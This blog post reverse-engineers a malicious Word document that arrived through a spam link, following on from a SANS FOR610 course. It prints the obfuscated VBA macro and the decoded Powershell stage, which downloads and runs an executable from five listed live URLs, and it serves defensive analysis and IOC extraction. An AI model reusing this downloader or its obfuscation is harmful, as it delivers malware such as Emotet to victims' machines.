What I learned by attending FOR610: Reverse-Engineering Malware / part 1

FOR610: Reverse-Engineering Malware

I attended SANS FOR610: Reverse-Engineering Malware, taught by Jess Garcia, in Copenhagen (Sep-17). I’m now studying for the certification and using captured malware samples as exercises. In this post I go through

  • Using public (OSINT) information;
  • Behavioural analysis with sandboxes (via a public malware sandbox);
  • Malicious Office documents.

Note that the purpose of the exercise is not to understand every line of code in the malware in detail. The analysis is done from an incident response point of view, with the goal of extracting useful Indicators of Compromise (IOCs), getting a basic understanding of the malware and assessing its impact.

MZZP3648741.doc

A received spam e-mail message included a link (not an attachment) pointing to a Word document. The Word document was

Filename: MZZP3648741.doc
Size: 75776 bytes
MD5: 1a4471c427c7b4d87f3edf0c150e4c89

Public / OSINT information

I downloaded the file on Mon 9-Oct-2017 and used the MD5 hash to check VirusTotal (search for the hash instead of uploading the file). The file was already known to VirusTotal and detected by 27 out of 60 AV engines (upload time was 2017-10-09 14:37:31 UTC).
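Computing the hash locally is all that is needed to search VirusTotal without uploading the sample. A minimal sketch in Python; the helper name md5_of_file is made up for this example and is not part of any tool used in this post.

```python
import hashlib


def md5_of_file(path, chunk_size=65536):
    """Return the hex MD5 digest of a file, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        # iter() with a sentinel keeps reading until read() returns b""
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Calling md5_of_file("MZZP3648741.doc") on the sample should give the MD5 listed above, which can then be pasted into the VirusTotal search box.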


Note that the filename by which I got the sample (MZZP3648741) was not listed under the file names already seen by VirusTotal.

Based on VirusTotal you can already conclude that this sample

  • May try to run other files, shell commands or applications;
  • Makes use of macros;
  • Was already analysed by a sandbox (via the VirusTotal community comments).

Analyse the sample with a sandbox

The report from VirusTotal told us that there is already a public sandbox report available via VxStream but I wanted to use my account with VMRay to analyse the behaviour of this file in another sandbox.

VMRay gives me a couple of screenshots of the running sample. Based on the screenshots I can conclude that the document tries to lure the user into enabling content (enable the macro to start).

The sandbox shows that Word starts a Powershell script, which in turn spawns a couple of exes.


According to VMRay these exes are

c:\users\hjrd1koky ds8lujv\appdata\local\temp\59488.exe (Created File)
c:\users\hjrd1koky ds8lujv\appdata\local\microsoft\windows\evtlaunch.exe (Created File)
MD5: cffa5435c773932a8ef271a762ce7cfb

c:\users\hjrd1koky ds8lujv\appdata\local\microsoft\windows\hhgqj.exe (Created File)
MD5: 710a2d061953888d8efb6994c976b543

The PE header of the last exe contains a very recent compile time but, most importantly, the file imports a number of interesting functions/DLLs. Based on these functions it is likely that the final exe (hhgqj.exe) is some sort of information stealer.
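The compile time that the sandbox reports comes from the TimeDateStamp field in the COFF header of the PE file. As an illustration only (VMRay does this for you), the field can be read with a few lines of Python; the function name pe_compile_time is an assumption of this sketch.

```python
import struct
from datetime import datetime, timezone


def pe_compile_time(data):
    """Return the COFF TimeDateStamp of a PE image as a UTC datetime."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew (offset of the PE signature) is stored at 0x3C in the DOS header
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # COFF header layout: Machine (2 bytes), NumberOfSections (2), TimeDateStamp (4)
    (timestamp,) = struct.unpack_from("<I", data, pe_offset + 8)
    return datetime.fromtimestamp(timestamp, tz=timezone.utc)
```

Keep in mind that this timestamp is written by the linker and can be forged, so it is a hint and not proof of when the sample was built.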

The VMRay analysis also provides the network indicators

matteostocchino.com/OpwqY/
66.147.244.177
198.1.78.129
46.4.67.203
147.135.209.118



As the purpose of the exercise is to practice skills I will also manually analyse the Word document.

Malicious Office documents

Deciding what are the important streams in an Office document

Oledump tells us that the file contains a stream (8) with a VBA macro.

oledump.py MZZP3648741.doc



We can use olevba to get more info on the macro and document. It will tell us that

  • when we open the document the macro autoopen will autostart (auto execute)
  • there’s a possible suspicious shell command
  • streams ‘Macros/VBA/ThisDocument’ and ‘Macros/VBA/Module1’ contain information that we should further analyse

olevba.py MZZP3648741.doc -a



Now let’s have a look at ‘Macros/VBA/ThisDocument’ (stream 9).

oledump.py MZZP3648741.doc -s 9 -v


and ‘Macros/VBA/Module1’ (stream 8) (with ASCII dump)

oledump.py MZZP3648741.doc -s 8 -v -a





Analysing the VBA code

The VBA macro contains two functions and two subs (FYI: a function returns a value, a sub doesn’t). None of the functions or subs take arguments.

The previous analysis showed that the sub autoopen is called when opening the document. The VBA code in autoopen() (and in the other functions and subs) is obfuscated with statements that pretend to represent ASCII values but are nothing more than sums of numbers.

Sub autoopen()
avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
 XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72
 epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81
 tzyGYTAbft = 69 + 84 + 83 + 96 + 58 + 97 + 55 + 77 + 58 + 55 + 75 + 84 + 82 + 92 + 68 + 57 + 93 + 85 + 95 + 95 + 59
 ynpsKeY = 60 + 65 + 89 + 78 + 87 + 86 + 95 + 68 + 76 + 62 + 67 + 69 + 91 + 99 + 98 + 80 + 76 + 82 + 67 + 85 + 94 + 79 + 68 + 65 + 95
 HrgnxUf = 61 + 63 + 65 + 74 + 73 + 64 + 98 + 63 + 88 + 64 + 60 + 66 + 83 + 86 + 59 + 88 + 58 + 79

DyEAfVFbGY
tFFBpbzEVBD = 95 + 85 + 64 + 83 + 63 + 82 + 81 + 91 + 86 + 62 + 87 + 82 + 72 + 98 + 84 + 82 + 67 + 80 + 74 + 87 + 92 + 83 + 92 + 59 + 90 + 79 + 79
 wWxbdvzHZu = 84 + 64 + 97 + 72 + 75 + 62 + 88 + 96 + 73 + 69 + 100 + 69 + 76 + 76 + 77 + 98 + 72 + 73 + 84 + 96 + 81 + 97 + 97 + 89
 UwkSNDsM = 94 + 74 + 67 + 78 + 65 + 60 + 60 + 84 + 88 + 60 + 59 + 64 + 89 + 91 + 69 + 80 + 66
 rBfuFxXEn = 100 + 80 + 91 + 62 + 89 + 90 + 92 + 98 + 62 + 66 + 70 + 66 + 95 + 58 + 71 + 78 + 55 + 62
 ZNZYbtVGX = 65 + 65 + 73 + 90 + 88 + 56 + 88 + 65 + 77 + 97 + 79 + 80 + 66 + 65 + 81 + 75 + 100 + 100 + 91 + 57 + 75 + 88 + 82 + 60 + 73
 NDwLRskNRm = 99 + 68 + 74 + 95 + 60 + 56 + 96 + 79 + 70 + 70 + 56 + 79 + 95 + 61 + 88 + 83 + 63
 VCLfrCtNZC = 79 + 62 + 59 + 99 + 74 + 87 + 56 + 68 + 87 + 81 + 69 + 55 + 89 + 91 + 95 + 75 + 94 + 61 + 59 + 66

End Sub

Removing the obfuscation leaves a number of variable assignments and one call to the sub DyEAfVFbGY. Apart from the visual obfuscation I cannot explain why the variables (avrPreFPA, XsdndfxXk, etc.) are assigned; to my understanding they do not influence the flow of the code.

avrPreFPA = 1553
XsdndfxXk = 1284
epHeyVxU = 1309
tzyGYTAbft = 1617
ynpsKeY = 1981
HrgnxUf = 1292

Call sub DyEAfVFbGY

tFFBpbzEVBD = 2179
wWxbdvzHZu = 1965
UwkSNDsM = 1248
rBfuFxXEn = 1385
ZNZYbtVGX = 1936
NDwLRskNRm = 1292
VCLfrCtNZC = 1506
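Adding up the numbers by hand gets tedious quickly. A minimal sketch of how the sums can be folded automatically, assuming the macro source was saved as text (for example from the oledump output); the name fold_sums is only illustrative.

```python
import re

# Matches "name = 12 + 34 + 56" where the right-hand side is only integers and "+"
SUM_ASSIGNMENT = re.compile(r"^\s*(\w+)\s*=\s*(\d+(?:\s*\+\s*\d+)+)\s*$")


def fold_sums(vba_source):
    """Replace integer-sum assignments by their total; keep other lines as-is."""
    folded = []
    for line in vba_source.splitlines():
        match = SUM_ASSIGNMENT.match(line)
        if match:
            name, expression = match.groups()
            total = sum(int(term) for term in expression.split("+"))
            folded.append(f"{name} = {total}")
        else:
            folded.append(line)
    return "\n".join(folded)
```

Lines that are not a pure sum, such as the call to DyEAfVFbGY, pass through unchanged, so the one meaningful statement stands out immediately.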

Jumping to the sub DyEAfVFbGY results in code with similar visual obfuscation and a call to the function SMUpGxrua. If we deobfuscate the code we end up with a function definition of

Function SMUpGxrua()
hMxfPTvZXC = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + " "

Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0
End Function

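That’s a lot of variables, and none of them has been assigned before or has a related function/sub, except one: TxxdszysVP. In VBA an unassigned variable is Empty and adds nothing when it is concatenated to a string, so all the other names are just padding. The function TxxdszysVP uses the same visual obfuscation and, after deobfuscation, contains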

Function TxxdszysVP()

AKMnVPdkUnv = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "comme" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "nts" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + cYwdSEuMaLm

TxxdszysVP = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + XZUsuxuC
End Function

A function returns a value by assigning to its own name. Because TxxdszysVP is called as a function we need to look at where TxxdszysVP is assigned a value. Besides the obfuscation, that assignment contains ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv).

What is AKMnVPdkUnv? It is assigned on the first line of the function and, after deobfuscation, contains the string “comments” (“comme” + “nts”).

So, after removing all the obfuscation we can conclude that the VBA code reads the Comments property of the Office document.
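The padding variables can be stripped mechanically, because a VBA variable that was never assigned is Empty and contributes nothing to a string concatenation. A rough sketch, assuming the expression only contains string literals and plain variable names (function calls such as Mid(...) are not handled); resolve_concatenation is a made-up helper name.

```python
import re

# Either a VBA string literal ("..." with "" as escaped quote) or an identifier
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)')


def resolve_concatenation(expression, known=None):
    """Evaluate a VBA "+" concatenation, treating unknown names as empty."""
    known = known or {}
    parts = []
    for literal, name in TOKEN.findall(expression):
        if name:
            # Unassigned VBA variables are Empty, which concatenates as ""
            parts.append(known.get(name, ""))
        else:
            parts.append(literal.replace('""', '"'))
    return "".join(parts)
```

Feeding it the right-hand side of the AKMnVPdkUnv assignment leaves only the two literals, joined into “comments”.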

How do you extract the document properties (including the comments)? With oledump!


oledump.py MZZP3648741.doc -M

The output of this command shows a lot of “weird” characters in the comments section, which is also the section referenced by the VBA code. The comments end with ‘==’, the typical padding of base64 encoded data. Why not use the base64dump utility to decode the output?

oledump.py MZZP3648741.doc -M | base64dump.py -d -s 7



The output looks like code that uses string manipulation to build a Powershell command. The actual execution happens back in the macro: the Mid() calls plus the literal “e” assemble the start of the command line from the comments text, and the Shell command launches it with the ,0 option (meaning vbHide or hidden).
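To make the Mid() trick concrete, here is a small Python sketch that mirrors the deobfuscated SMUpGxrua() function. The slice positions (1,2), (11,4), (23,6) and 40 come from the macro; everything else is an assumption. The comments value below is HYPOTHETICAL (the filler characters and the payload are invented), and the sketch assumes that the slices spell out “powershell -” so that the appended “e” gives the -e (EncodedCommand) switch, which expects base64 of UTF-16LE text.

```python
import base64


def mid(text, start, length=None):
    """VBA-style Mid(): 1-based start position, optional length."""
    begin = start - 1
    return text[begin:] if length is None else text[begin:begin + length]


def build_command(comments):
    """Mirror the deobfuscated SMUpGxrua(): launcher prefix plus payload."""
    prefix = mid(comments, 1, 2) + mid(comments, 11, 4) + mid(comments, 23, 6) + "e" + " "
    return prefix + mid(comments, 40)


def decode_encoded_command(payload):
    """Decode a Powershell -EncodedCommand argument (base64 of UTF-16LE)."""
    return base64.b64decode(payload).decode("utf-16-le")


# HYPOTHETICAL comments value, built only to illustrate the slicing.
payload = base64.b64encode("Write-Host 'hello'".encode("utf-16-le")).decode("ascii")
comments = "po" + "#" * 8 + "wers" + "#" * 8 + "hell -" + "#" * 11 + payload
```

With this invented input, build_command(comments) returns the launcher string followed by the payload, and decode_encoded_command(payload) gives back the readable script. The real comments field of the sample is not reproduced here.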

The easiest way to debug Powershell code is by using Powershell ISE.

The last part of the code is |invOkE-ExprEssiON. We can print the code that would be executed by replacing it with Write-Host.


Instead of running the code, this prints it. The printed code creates a new web client object.

$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://matteostocchino.com/OpwqY/,http://damanidigital.com/w/,http://on-int.com/JJEKjn/,http://ardentfilms.com/WuU/,http://markjgriffin.ie/Iy/'.Split(',');
$name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

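This code walks through 5 different URLs and stops at the first one that successfully delivers a file. The download is stored in the temp folder as a number followed by .exe and is then started. The number is random: $random.next(1, 65536) returns a value from 1 to 65535, because the upper bound of Random.Next is exclusive. At the time of writing, only one site was still active.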
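Pulling the URLs and host names out of the decoded script gives the network IOCs in a form that is easy to hand over. A minimal sketch, assuming the decoded Powershell is available as one string without line wraps (a URL broken over two lines would be cut short); extract_network_iocs is an illustrative name.

```python
import re
from urllib.parse import urlsplit

# Stop at whitespace, quotes, commas and semicolons, which delimit the URLs here
URL_PATTERN = re.compile(r"https?://[^\s'\",;]+")


def extract_network_iocs(script):
    """Return (urls, hosts) found in a script, de-duplicated, in order."""
    urls = list(dict.fromkeys(URL_PATTERN.findall(script)))
    hosts = list(dict.fromkeys(urlsplit(url).hostname for url in urls))
    return urls, hosts
```

For the script above this returns the five download URLs and their five host names, ready to be added to a blocklist.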

MD5 (index.html.exe) = cffa5435c773932a8ef271a762ce7cfb

Verifying conclusions from manual analysis with sandbox analysis

Based on the sandbox analysis alone we would have concluded that the file name 59488.exe is an IOC. However, analysing the actual code shows that this name is randomly generated. The code also shows that, next to the network IOC detected by VMRay, 4 other URLs are included.

  • The filename is a randomly generated number from 1 to 65535, followed by .exe;
  • 5 different URLs are used to download a second stage of the malware.

In this case, the manual analysis cost more time but gave more detailed results. The random file name could also have been deduced by running the sample several times in a sandbox (in VMRay the sample was automatically analyzed 4 times, with 4 different MS Office versions).

Summary flow of the Office document

The workflow of the document was

  1. Lure user into enabling macro
  2. Obfuscated macro, autoopen() starts when macros are enabled
  3. Different Subs / Functions, call to the comment property of the Office document
  4. Comments property contains base64 encoded Powershell
  5. Powershell script uses string manipulation to build and execute code that creates a web client object
  6. Web client downloads exe and stores it with a random filename

Summary IOCs

Detection can be based on

  • The network information found in the Powershell script
  • Newly created files in the temp folder named with a number from 1 to 65535 followed by .exe
  • Launch of Powershell from the Word process

Ideally the network IOCs are added to the IDS and the DNS firewall (blackhole DNS zone).
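Because the dropped file name is random, a fixed name such as 59488.exe is a poor IOC; matching the naming pattern works better. A minimal sketch of such a check, for example to filter file-creation events; the function name is_candidate_dropper_name is an assumption, and a match is only a hint because legitimate files can have numeric names too.

```python
import re
from pathlib import PureWindowsPath

# One to five digits without leading zero, followed by .exe
NUMERIC_EXE = re.compile(r"^([1-9]\d{0,4})\.exe$", re.IGNORECASE)


def is_candidate_dropper_name(path):
    """True if the file name is <1..65535>.exe, as produced by $random.next(1, 65536)."""
    match = NUMERIC_EXE.match(PureWindowsPath(path).name)
    return bool(match) and 1 <= int(match.group(1)) <= 65535
```

Combining this check with the parent process (Powershell started by Word) should reduce false positives considerably.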

Analyzing cffa5435c773932a8ef271a762ce7cfb

The analysis of the file downloaded via the Powershell script will be covered in a follow-up post. Based on the information from VirusTotal and VxStream this is an Emotet sample.

3 thoughts on “What I learned by attending FOR610: Reverse-Engineering Malware / part 1”

  1. Mitch Impey on said:

    Hi Koen, great article, thanks for sharing this information. I was at Brucon a few weeks ago and took a session called Malware Triage by Sean Wilson and Sergei Frankoff from openanalysis.net. They shared alot of interesting things that you might find useful, like the Sublime editor and CyberChef for various decoding tasks (https://gchq.github.io/CyberChef/)
    Cheers, mitch

    • admin on said:

      Hi Mitch,

      Thank you for the info. Already a happy user of CyberChef ;-).
      Will look into the slides of that presentation, especially for info on Sublime Editor. Thanks!

      Koen
